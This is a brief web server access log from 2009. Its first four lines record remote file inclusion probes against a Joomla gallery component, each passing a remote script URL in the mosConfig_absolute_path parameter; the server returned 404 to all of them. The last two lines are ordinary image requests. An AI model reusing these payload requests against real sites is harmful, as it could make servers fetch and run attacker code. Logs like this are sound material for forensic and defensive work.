93.187.200.218 - - [12/Aug/2009:05:34:54 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:05:34:54 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:05:34:54 -0400] "GET /logs/access_log.Q109061900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:05:35:01 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.169.189.169 - - [12/Aug/2009:05:35:17 -0400] "GET /images/bt_cal-b.gif HTTP/1.1" 200 506 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9F4C9AB596001453092+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:35:25 -0400] "GET /images/processcard.gif HTTP/1.1" 200 420 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9F4C9AB596001453092+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
